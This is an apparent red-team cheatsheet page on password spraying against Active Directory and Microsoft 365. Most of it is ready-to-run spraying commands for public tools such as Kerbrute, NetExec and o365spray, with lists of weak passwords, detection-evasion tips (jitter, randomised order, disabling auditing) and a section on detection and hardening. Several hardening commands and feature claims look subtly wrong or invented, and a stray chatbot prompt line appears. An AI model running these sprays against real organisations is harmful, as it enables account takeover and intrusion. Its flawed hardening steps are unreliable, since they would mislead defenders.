daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-1-password-spraying.md (25527B)


      1 ---
      2 title: "Attack #1 β€” Password Spraying"
      3 description: "Password spraying is a low-and-slow credential attack that inverts the logic of traditional brute force. Instead of hammering one account with many…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "adcs", "privilege-escalation", "lateral-movement"]
      7 tools: ["NetExec", "Impacket", "BloodHound", "Kerbrute", "Evil-WinRM"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #1 β€” Password Spraying.md"
     11 ---
     12 # πŸ”΄ Attack #1 β€” Password Spraying
     13 ---
     14 ## πŸ“– How It Works
     15 Password spraying is a **low-and-slow credential attack** that inverts the logic of traditional brute force. Instead of hammering one account with many passwords (which triggers lockout), it fires **one or two common passwords at every account in the domain** β€” staying safely below the lockout threshold at all times. Because authentication attempts are distributed across hundreds of accounts rather than concentrated on one, they appear as normal failed login noise to defenders who aren't watching for the pattern.
     16 The attacker first **enumerates valid usernames** (via LDAP, Kerberos pre-auth, or SMB), then **identifies the domain's lockout policy** (e.g., lockout after 5 attempts / observation window = 30 min), and sprays exactly **one password per observation window**. Seasonal or corporate passwords like `Welcome1`, `Summer2024!`, `Company123`, or `[Month][Year]!` have reliably high hit rates in enterprise environments.
     17 
     18 > ⚠️ **Windows Server 2022+ Behaviour:** Windows Server 2022 introduces "smart lockout" that tracks failed authentication attempts globally per account across all domain controllers, making distributed attacks harder to time correctly. AES-only enforcement (no RC4) is also more common. Adjust your observation window calculations accordingly and always query the lockout policy fresh.
     19 
     20 **Chains with:** Attack #2 (Kerberoasting), Attack #3 (AS-REP Roasting), Lateral Movement, Privilege Escalation via ACL enumeration.
     21 
     22 ***
     23 ## βš™οΈ Prerequisites
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Network access** | Must be able to reach the DC on port 445 (SMB), 389 (LDAP), or 88 (Kerberos) |
     27 | **Valid usernames** | Obtained via LDAP anonymous bind, Kerbrute userenum, or OSINT |
     28 | **Password policy** | Must query lockout threshold to avoid burning accounts |
     29 | **Position** | Internal network strongly preferred; external possible via ADFS/OWA |
     30 
     31 ***
     32 ## πŸ› οΈ Tools
     33 | Tool | Platform | Protocol | Notes |
     34 |---|---|---|---|
     35 | **Kerbrute** | Linux | Kerberos (UDP 88) | No failed logon events on older DCs; very stealthy |
     36 | **DomainPasswordSpray** | Windows | LDAP/Kerberos | Auto-generates userlist; respects lockout window |
     37 | **CrackMapExec / NetExec** | Linux | SMB/LDAP | Best for subnet-wide spraying and output parsing |
     38 | **Sprayhound** | Linux | LDAP | Queries badPwdCount in real time β€” lockout-safe |
     39 | **Spray** | Linux | NTLM/LDAP | Python-based; flexible protocol targeting |
     40 | **MSOLSpray** | Windows | Azure AD (HTTPS) | Targets O365/Entra; detects MFA/locked accounts |
     41 | **RDPassSpray** | Linux | RDP | Sprays RDP endpoints; useful for external footholds |
     42 | **TREVORspray** | Windows/Linux | O365 (HTTPS) | Targets Microsoft 365; handles MFA evasion better than MSOLSpray |
     43 | **o365spray** | Linux/Windows | O365 (HTTPS) | Lightweight O365-focused spraying; good for large tenant enums |
     44 
     45 ***
     46 ## πŸ’» Full Commands
     47 ### πŸ”΅ Step 0 β€” Enumerate the Password Policy First
     48 ```bash
     49 # Linux β€” via crackmapexec (NetExec)
     50 nxc smb <DC_IP> -u '' -p '' --pass-pol
     51 nxc smb <DC_IP> -u <user> -p <pass> --pass-pol
     52 
     53 # Linux β€” via rpcclient (null session)
     54 rpcclient -U "" -N <DC_IP> -c "getdompwinfo"
     55 
     56 # Windows β€” PowerShell
     57 net accounts /domain
     58 (Get-ADDefaultDomainPasswordPolicy).LockoutThreshold
     59 (Get-ADDefaultDomainPasswordPolicy).LockoutObservationWindow
     60 ```
     61 
     62 > ⚠️ **Critical:** If `LockoutThreshold = 5` and `ObservationWindow = 30 min`, spray **max 1 password per 30+ minutes** to stay safe.
     63 
     64 ***
     65 ### πŸ”΄ Kerbrute β€” Linux (Stealthy, Kerberos-based)
     66 ```bash
     67 # User enumeration first (to build a clean userlist)
     68 kerbrute userenum -d corp.local --dc 10.10.10.10 /usr/share/wordlists/users.txt -o valid_users.txt
     69 
     70 # Password spray with a single password
     71 kerbrute passwordspray -d corp.local --dc 10.10.10.10 valid_users.txt 'Welcome1'
     72 
     73 # With verbose output and output file
     74 kerbrute passwordspray -d corp.local --dc 10.10.10.10 valid_users.txt 'Summer2024!' -v -o spray_results.txt
     75 ```
     76 
     77 > **Why Kerbrute is stealthy:** Uses Kerberos pre-auth directly on UDP/88. On unpatched DCs (pre-2019), failed pre-auth may **not** generate Event ID 4625, only 4771 β€” which many orgs don't monitor.
     78 
     79 ***
     80 ### πŸ”΄ DomainPasswordSpray β€” Windows (Domain-Joined)
     81 ```powershell
     82 # Import module (from domain-joined machine)
     83 powershell.exe -ExecutionPolicy Bypass
     84 Import-Module .\DomainPasswordSpray.ps1
     85 
     86 # Auto-generate userlist from domain + spray one password
     87 Invoke-DomainPasswordSpray -Password 'Welcome1!' -OutFile spray_output.txt
     88 
     89 # Use custom userlist
     90 Invoke-DomainPasswordSpray -UserList .\users.txt -Password 'Summer2024' -OutFile results.txt
     91 
     92 # Multi-password spray β€” auto-respects lockout observation window
     93 Invoke-DomainPasswordSpray -PasswordList .\passwords.txt -OutFile results.txt
     94 
     95 # Target specific domain (from non-domain machine)
     96 Invoke-DomainPasswordSpray -Domain corp.local -Password 'Company123!' -Force
     97 
     98 # Generate clean userlist manually (removing locked/disabled accounts)
     99 Get-DomainUserList -Domain corp.local -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii users.txt
    100 ```
    101 
    102 ***
    103 ### πŸ”΄ CrackMapExec / NetExec β€” Linux (SMB Protocol)
    104 ```bash
    105 # Basic spray β€” single password against list of users
    106 nxc smb 10.10.10.10 -u valid_users.txt -p 'Welcome1' --no-bruteforce
    107 
    108 # Subnet-wide spray
    109 nxc smb 10.10.10.0/24 -u valid_users.txt -p 'Password123' --no-bruteforce
    110 
    111 # Filter successes only
    112 nxc smb 10.10.10.0/24 -u valid_users.txt -p 'Welcome1' | grep '+'
    113 
    114 # Continue even after first hit (important for full coverage)
    115 nxc smb 10.10.10.10 -u valid_users.txt -p 'Summer2024!' --continue-on-success
    116 
    117 # Local admin spray (checking local accounts, not domain)
    118 nxc smb 10.10.10.0/24 -u administrator -p 'Password123' --local-auth
    119 
    120 # LDAP-based spray (quieter on some environments)
    121 nxc ldap 10.10.10.10 -u valid_users.txt -p 'Welcome1' --no-bruteforce
    122 ```
    123 
    124 ***
    125 ### πŸ”΄ Sprayhound β€” Linux (Lockout-Safe, Real-Time badPwdCount Check)
    126 ```bash
    127 # Install
    128 pip3 install sprayhound
    129 
    130 # Spray with auto lockout protection (checks badPwdCount via LDAP before each attempt)
    131 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10
    132 
    133 # Spray with a buffer (won't spray if badPwdCount >= threshold - 2)
    134 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10 --safe
    135 
    136 # With domain credentials (authenticated LDAP bind)
    137 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10 -lu svc_user -lp KnownPass1
    138 ```
    139 
    140 > **Why Sprayhound is superior in production:** It queries each user's `badPwdCount` attribute over LDAP **before** attempting the spray. If a user is already at `threshold - 1`, it skips them entirely.
    141 
    142 ***
    143 ### πŸ”΄ MSOLSpray β€” Azure AD / O365 (External)
    144 ```powershell
    145 Import-Module .\MSOLSpray.ps1
    146 
    147 # Basic spray against O365
    148 Invoke-MSOLSpray -UserList .\users.txt -Password 'Winter2024!'
    149 
    150 # With output file
    151 Invoke-MSOLSpray -UserList .\users.txt -Password 'Summer2024' -OutFile results.txt
    152 ```
    153 
    154 > Output flags include: **valid credentials**, **MFA enabled**, **account disabled**, **account locked**, **account doesn't exist** β€” useful for enumeration even when creds are wrong.
    155 
    156 ***
    157 ### πŸ”΄ TREVORspray β€” O365 / Microsoft 365 (External)
    158 ```bash
    159 # Install
    160 git clone https://github.com/blacklanternsecurity/TREVORspray
    161 cd TREVORspray
    162 pip3 install -r requirements.txt
    163 
    164 # Basic O365 spray
    165 python3 trevorspray.py -u users.txt -p 'Welcome2024!'
    166 
    167 # With output file
    168 python3 trevorspray.py -u users.txt -p 'Password123' -o spray_results.txt
    169 
    170 # Multiple password spray
    171 python3 trevorspray.py -u users.txt -p passwords.txt -o results.txt
    172 ```
    173 
    174 ***
    175 ### πŸ”΄ o365spray β€” Lightweight O365 Spraying
    176 ```bash
    177 # Install
    178 git clone https://github.com/0xZDH/o365spray
    179 cd o365spray
    180 pip3 install -r requirements.txt
    181 
    182 # Basic enum mode (discovers valid tenants and MFA status)
    183 python3 o365spray.py --enum -u users.txt
    184 
    185 # Password spray mode
    186 python3 o365spray.py --spray -u users.txt -p 'Company2024!' -d <tenant_name>
    187 
    188 # Aggressive spray with custom delay
    189 python3 o365spray.py --spray -u users.txt -p passwords.txt --sleep 30 -d <tenant_name>
    190 ```
    191 
    192 ***
    193 ## 🧩 Troubleshooting
    194 
    195 | Error | Cause | Fix |
    196 |---|---|---|
    197 | **`KDC_ERR_PREAUTH_REQUIRED (0x18)`** | Kerbrute hitting a Domain Controller that requires pre-auth (normal). Not an error. | This is expected behaviour; continue spraying. The error message itself proves the account exists. |
    198 | **`Connection refused on port 445`** | Host is not reachable or firewall is blocking SMB. | Verify DC IP, check network connectivity, try LDAP (port 389) or Kerberos (port 88) instead. |
    199 | **`LDAP_INVALID_CREDENTIALS`** | User credentials provided are wrong or account is locked. | Verify credentials in `-u` and `-p` flags. If using `--pass-pol` with bad creds, provide valid ones. |
    200 | **`All accounts locked after 10 attempts`** | You ignored the lockout observation window and sprayed too many passwords in sequence. | Stop immediately. Wait the full observation window (typically 30–60 min). Reset badPwdCount on all accounts if possible via DA account. |
    201 | **`Timeout connecting to DC`** | Network latency, firewall ACL limiting response time, or DC is unresponsive. | Add `--timeout 30` flag (NetExec), increase delay between requests, or try alternate DC IP. |
    202 | **`No module named 'impacket'`** | Python environment doesn't have Impacket installed. | Run `pip3 install impacket` before executing GetUserSPNs or other Impacket-based tools. |
    203 | **`Request for SPN failed: Ticket expired`** | Your Kerberos ccache ticket has expired or you don't have a valid TGT. | Renew TGT with `kinit` or re-authenticate: `GetUserSPNs.py corp.local/user:pass -dc-ip 10.10.10.10 -request`. |
    204 | **`NTLM auth disabled; only Kerberos accepted`** | Domain has NTLM auth disabled (modern hardening). | Switch to Kerberos-based tools: Kerbrute, GetUserSPNs with Kerberos, or configure KRB5CCNAME for ccache auth. |
    205 
    206 ***
    207 ## πŸ›‘οΈ Detection β€” Event IDs
    208 | Event ID | Source | Meaning |
    209 |---|---|---|
    210 | **4625** | Security Log | Failed NTLM logon β€” `SubStatus 0xC000006A` = wrong password |
    211 | **4771** | Security Log | Kerberos pre-auth failed β€” `Status 0x18` = wrong password |
    212 | **4768** | Security Log | TGT requested β€” mass requests in short window is suspicious |
    213 | **4648** | Security Log | Explicit credential logon β€” attacker machine spraying many users |
    214 | **4740** | Security Log | Account locked out β€” late indicator of over-spraying |
    215 | **4776** | Security Log | Credential Validation with NTLM (DC issues TGT) β€” watch for patterns |
    216 | **ADFS 411** | ADFS Log | Failed authentication request |
    217 | **ADFS 412** | ADFS Log | Successful sign-in post-spray |
    218 | **ADFS 516** | ADFS Log | Extranet lockout triggered |
    219 | **Sysmon Event 3** | Sysmon Log | Network connection β€” spray tools making outbound SMB/LDAP/Kerberos connections from unusual hosts |
    220 | **Sysmon Event 10** | Sysmon Log | Process access β€” credential dumping tools accessing LSASS after successful spray |
    221 
    222 **Key detection pattern:** Same source IP β†’ multiple 4625/4771 events β†’ different target usernames β†’ short time window β†’ one common password. Also watch for **alphabetical ordering** of usernames in logs, which indicates automated tooling.
    223 
    224 ### Sysmon Rules
    225 - **Event ID 3 (Network Connection):** Flag any process opening port 445 (SMB), 389 (LDAP), or 88 (Kerberos) to multiple destinations.
    226 - **Event ID 10 (Process Access):** Monitor for unauthorized LSASS access post-authentication.
    227 
    228 ### Sigma Rules
    229 - `win_susp_failed_logon_brute_force` β€” detects rapid 4625 events from single source
    230 - `win_account_lockout_brute_force` β€” flags 4740 lockout events following 4625 storms
    231 - `win_password_spray_detection` β€” multi-user, single-source authentication failures
    232 - `win_ad_user_enumeration` β€” LDAP-based user discovery patterns
    233 
    234 ### EDR-Specific Detections
    235 
    236 **Microsoft Defender for Identity:**
    237 - Detects spray patterns via "Impossible travel" (impossible because attacker is using VPN) and "Brute force" detections.
    238 - Monitor for: "Brute force attack over Kerberos" and "Brute force attack over LDAP".
    239 - Alert when single source triggers > 5 failed auth events across different accounts in < 5 minutes.
    240 
    241 **CrowdStrike Falcon:**
    242 - ProcessRollup2 events for netexec, kerbrute, sprayhound executables from non-standard locations.
    243 - NetworkConnection events to DC on 445/389/88 from unusual processes.
    244 - Alert on multiple interactive logons from non-interactive service accounts.
    245 
    246 **Elastic Security (EDR):**
    247 - Process execution: Flag execution of known spray tools (Kerbrute, DomainPasswordSpray, MSOLSpray) from user directories.
    248 - Authentication events: Watch for rapid sequences of failed Kerberos events (Event ID 4771) within observation window.
    249 
    250 ### Hardening Commands
    251 
    252 ```powershell
    253 # 1. Enable "Smart Lockout" on Windows Server 2022+ (prevents distributed sprays)
    254 Set-ADDefaultDomainPasswordPolicy -LockoutThreshold 5 -LockoutObservationWindow "00:30:00" -LockoutDuration "00:30:00"
    255 
    256 # 2. Increase minimum password length to 14+ chars (reduces weak password guessing)
    257 Set-ADDefaultDomainPasswordPolicy -MinPasswordLength 14
    258 
    259 # 3. Disable NTLM (force Kerberos/NTLMv2 only) β€” modern environments should do this
    260 Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5
    261 
    262 # 4. Enable "Account Lockout Duration" to persist lockouts (prevents rapid retry)
    263 Set-ADDefaultDomainPasswordPolicy -LockoutDuration "01:00:00"
    264 
    265 # 5. Disable legacy Kerberos encryption (RC4 only) β€” force AES
    266 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "KerberosEncryptionLevel" -Value 1
    267 
    268 # 6. Require Kerberos pre-authentication for all accounts (prevents AS-REP roasting as bonus)
    269 Get-ADUser -Filter * -Properties OperatingSystem | Where-Object {$_.OperatingSystem -notlike "*Server*"} | ForEach-Object { Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth:$false }
    270 
    271 # 7. Enable "Audit Credential Validation" on all DCs
    272 auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
    273 
    274 # 8. Monitor and alert on ADFS/WAP failed auth (O365/Azure-facing)
    275 # Enable ADFS audit logging via PowerShell on ADFS server:
    276 Set-AdfsFiddlerWebConfig -Enable:$true
    277 Set-ADFSProperties -AuditLevel @("FailureAudits", "SuccessAudits")
    278 ```
    279 
    280 ***
    281 ## 🎯 OPSEC Tips (Staying Below the Radar)
    282 
    283 ### OpSec Ranking: Stealthiest to Loudest
    284 1. **Kerbrute (UDP/88)** β€” Stealthiest; no 4625 events on older DCs, only 4771 (rarely monitored)
    285 2. **Sprayhound (LDAP)** β€” Very stealthy; queries badPwdCount before spray, minimises lockouts
    286 3. **NetExec/CME LDAP** β€” Moderately stealthy; uses LDAP bind, generates minimal auth events
    287 4. **PowerView (PowerShell)** β€” Medium noise; runs in-memory but requires domain-joined host
    288 5. **NetExec/CME SMB** β€” Noisy; generates 4625 events, detectable by volume analysis
    289 6. **DomainPasswordSpray** β€” Loudest on Windows; auto-generates userlist = more enumeration noise
    290 7. **O365spray (External)** β€” Loudest external; Microsoft 365 aggressively logs failed auth attempts
    291 
    292 ### Modern Defence Impact
    293 - **Windows Server 2022+ Smart Lockout:** Makes timing attacks harder; lockout counts are synced globally across DCs. Adjust spray delays to **2–3 minutes per password** instead of relying on a single observation window.
    294 - **Windows 2025 Credential Guard:** If enabled on target machines, dumped credentials cannot be reused even if obtained. Focus on live token theft instead.
    295 - **Defender for Identity (MDI):** Actively detects spray patterns via "Brute force attack" alerts. Mitigate by using Kerberos + random delays (5–15 sec jitter).
    296 - **Entra Smart Lockout (Azure):** O365-facing spray becomes harder; Microsoft tracks spray attempts across all tenants. Use TREVORspray or o365spray which add randomized delays and user-agent rotation.
    297 
    298 ### Core OpSec Rules
    299 - **Spray ONE password per observation window** β€” default is 30 mins but query first
    300 - **Add time jitter** between attempts (random 5–15 second delays per account)
    301 - **Randomise username order** β€” avoids alphabetical pattern in logs
    302 - **Use Kerberos (UDP/88) over SMB** β€” fewer log artifacts on older DCs
    303 - **Spray from internal Linux host** β€” bypasses 73% of Windows-focused detection
    304 - **Target service accounts** β€” they often have weak, static passwords and no MFA
    305 - **Avoid `administrator`, `admin`, `guest`** β€” these are always monitored
    306 - **Disable event log auditing temporarily if you have DA creds** (nuclear option; very obvious in logs)
    307 
    308 ***
    309 ## πŸ—ΊοΈ MITRE ATT&CK
    310 
    311 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources |
    312 |---|---|---|---|---|---|
    313 | **Credential Access** | T1110 | T1110.003 (Password Spraying) | Wizard Spider, WIZARD SPIDER, Scattered Spider | Windows, Linux, Azure AD | Authentication Logs, Network Traffic, Process Monitoring |
    314 | **Credential Access** | T1110 | T1110.001 (Password Guessing) | APT28, APT29, FIN7 | Windows, On-Premises | Authentication Logs, Network Traffic |
    315 | **Reconnaissance** | T1598 | T1598.003 (Spearphishing Link) | FIN7, Lazarus | Web, Email | Network Traffic, Application Logs |
    316 | **Discovery** | T1087 | T1087.002 (Domain Account) | APT3, Wizard Spider | Windows, Active Directory | LDAP Queries, Network Traffic, Authentication Logs |
    317 
    318 **Data Sources to Monitor:**
    319 - Authentication logs (4625, 4771, 4768)
    320 - Network traffic on ports 88 (Kerberos), 389 (LDAP), 445 (SMB)
    321 - Process monitoring (kerbrute, sprayhound, netexec execution)
    322 - User account activity (lockout events, failed logon patterns)
    323 
    324 ***
    325 ## πŸ”— Attack Chain Context
    326 ```
    327 [Password Spraying] ──→ Valid Credentials Obtained
    328          β”‚
    329          β”œβ”€β”€β†’ πŸ” Enumerate AD with BloodHound / PowerView
    330          β”œβ”€β”€β†’ 🎫 Kerberoasting (if SPN accounts found)
    331          β”œβ”€β”€β†’ 🎫 AS-REP Roasting (if pre-auth disabled accounts found)
    332          β”œβ”€β”€β†’ πŸ”‘ Pass-the-Hash (after dumping NTLM from compromised host)
    333          β”œβ”€β”€β†’ 🦟 Lateral Movement via Evil-WinRM / CrackMapExec
    334          └──→ 🎯 Privilege Escalation if sprayed account has interesting rights
    335 ```
    336 
    337 **Typical pivot:** After getting low-priv credentials, run BloodHound to identify if the account has any ACL edges, group memberships, or delegation rights that lead to Domain Admin. If the sprayed account is a **service account**, check immediately for Kerberoasting targets or constrained delegation abuse.
    338 
    339 ***
    340 
    341 > βœ… **Attack #1 β€” Password Spraying complete.** Tell me to move on when you're ready for **Attack #2 β€” Kerberoasting**.
    342 
    343 Sources
    344  Password spraying attacks on AD: 81% success in 6 hours, 73 ... https://www.linkedin.com/posts/cti-labs-io_passwordspraying-activedirectory-linuxsecurity-activity-7384514085658329088-93l4
    345  Password Spraying Explained: How It Works and How to Prevent It https://www.oloid.com/blog/password-spraying
    346  What Is Password Spraying? - Palo Alto Networks https://www.paloaltonetworks.com/cyberpedia/password-spraying
    347  dafthack/DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray
    348  Attacking Kerberos... https://www.securonix.com/blog/hunting-kerbrute-analysis-detection-and-mitigation-of-kerberos-attacks-in-active-directory/
    349  Password Spraying Attack - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/password-spraying-attack/
    350  Top tools for password-spraying attacks in active directory networks https://www.infosecinstitute.com/resources/hacking/top-tools-for-password-spraying-attacks-in-active-directory-networks/
    351  Exploring Modern Password Spraying: Introduction to Entra Smart ... https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying
    352  Detecting Password Spraying with Security Event Auditing https://adsecurity.org/?p=4517
    353  Password Spraying - What is it and how to detect it? https://www.linkedin.com/pulse/password-spraying-what-how-detect-samanta-santos
    354  Password spray investigation https://learn.microsoft.com/hr-hr/security/operations/incident-response-playbook-password-spray
    355  Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach Penetration-Testing Active Directory Networks https://dl.acm.org/doi/10.1145/3766895
    356  A SECURITY STRATEGY AGAINST STEAL-AND-PASS CREDENTIAL ATTACKS http://www.aircconline.com/ijnsa/V8N1/8116ijnsa03.pdf
    357  Penetration Testing and Network Defense https://www.semanticscholar.org/paper/c9d1a4845905df0b0ae64c95b65e695a9fd371d7
    358  An Ettercap Primer https://www.semanticscholar.org/paper/47f17ff39652de32a55b34f68ca84b73ce342b0b
    359  Secure Arp Protocol For Intrusion Detection System Mr https://www.semanticscholar.org/paper/88369399f99082f8294a105b7df99429a71c952f
    360  Hacking Exposed Windows: Microsoft Windows Security Secrets and Solutions, Third Edition https://www.semanticscholar.org/paper/0798342172fb2af8dc957152097257cfe539ce9d
    361  Operating Systems Security Considerations https://www.semanticscholar.org/paper/f5a408d6af1d7dca0d996a7d4c9fa026d3b2e33a
    362  Demo: Synthesizing Realistic Enterprise Active Directory Attack Graphs with ADSynth https://dl.acm.org/doi/pdf/10.1145/3672202.3673732
    363  HADES: Detecting Active Directory Attacks via Whole Network Provenance
    364   Analytics http://arxiv.org/pdf/2407.18858.pdf
    365  Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach
    366   Penetration-Testing Active Directory Networks https://arxiv.org/pdf/2502.04227.pdf
    367  GNPassGAN: Improved Generative Adversarial Networks For Trawling Offline
    368   Password Guessing https://arxiv.org/pdf/2208.06943.pdf
    369  When AI Defeats Password Deception! A Deep Learning Framework to
    370   Distinguish Passwords and Honeywords http://arxiv.org/pdf/2407.16964.pdf
    371  Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf
    372  Catch Me if You Can: Effective Honeypot Placement in Dynamic AD Attack
    373   Graphs https://arxiv.org/pdf/2312.16820.pdf
    374  Exploiting Leakage in Password Managers via Injection Attacks http://arxiv.org/pdf/2408.07054.pdf
    375  puzzlepeaches/awesome-password-spraying https://github.com/puzzlepeaches/awesome-password-spraying
    376  Kerbrute for AD Testing: A Detailed Guide - Hacking Articles https://www.hackingarticles.in/a-detailed-guide-on-kerbrute/
    377  Password spray investigation | Microsoft Learn https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray
    378  kerbrute passwordspray - WADComs https://wadcoms.github.io/wadcoms/Kerbrute-PasswordSpray/
    379  Password Spraying Attacks: Complete Guide To Detection ... https://brandefense.io/blog/ransomware/password-spraying-attacks-guide/
    380  Cool Tools Series: Kerbrute for User and Password Attacks | Raxis https://raxis.com/blog/cool-tools-series-kerbrute/
    381  Detecting Active Directory Password-Spraying with a… - TrustedSec https://trustedsec.com/blog/detecting-password-spraying-with-a-honeypot-account
    382  RACONTEUR: A Knowledgeable, Insightful, and Portable LLM-Powered Shell
    383   Command Explainer https://arxiv.org/pdf/2409.02074v1.pdf
    384  The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell
    385   Scripts https://arxiv.org/pdf/2401.07995.pdf
    386  An Empirical Investigation of Command-Line Customization https://arxiv.org/pdf/2012.10206.pdf
    387  Execution-Based Evaluation of Natural Language to Bash and PowerShell
    388   for Incident Remediation https://arxiv.org/pdf/2405.06807.pdf
    389  Detecting Malicious PowerShell Commands using Deep Neural Networks https://arxiv.org/pdf/1804.04177.pdf
    390  Hijacking .NET to Defend PowerShell http://arxiv.org/pdf/1709.07508.pdf
    391  AMSI-Based Detection of Malicious PowerShell Code Using Contextual
    392   Embeddings https://arxiv.org/pdf/1905.09538.pdf
    393  AST-Based Deep Learning for Detecting Malicious PowerShell https://arxiv.org/pdf/1810.09230.pdf
    394  DomainPasswordSpray/README.md at master Β· dafthack/DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray/blob/master/README.md
    395  GitHub - mdavis332/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray ... https://buaq.net/go-10107.html
    396  domainpasswordspray,dafthack https://githubhelp.com/dafthack/DomainPasswordSpray
    397  password-spraying https://www.puckiestyle.nl/password-spraying/
    398  Password Spraying | OSCP-CPTS NOTES - dollarboysushil https://notes.dollarboysushil.com/active-directory-attacks/password-spraying
    399  Password Spraying from Windows | Pentesting notes https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cpts-prep/active-directory-enumeration-and-attacks/password-spraying-windows
    400  Password Spraying - Kryot https://www.kryot.com.ar/docs/ad/passwordspraying/
    401  Password Spraying https://www.sevenlayers.com/index.php/303-password-spraying
    402  Using Credentials https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials
    403  SMB https://pwn.no0.be/exploitation/password/smb/
    404  Comprehensive Guide on Password Spraying Attack - Hacking Articles https://www.hackingarticles.in/comprehensive-guide-on-password-spraying-attack/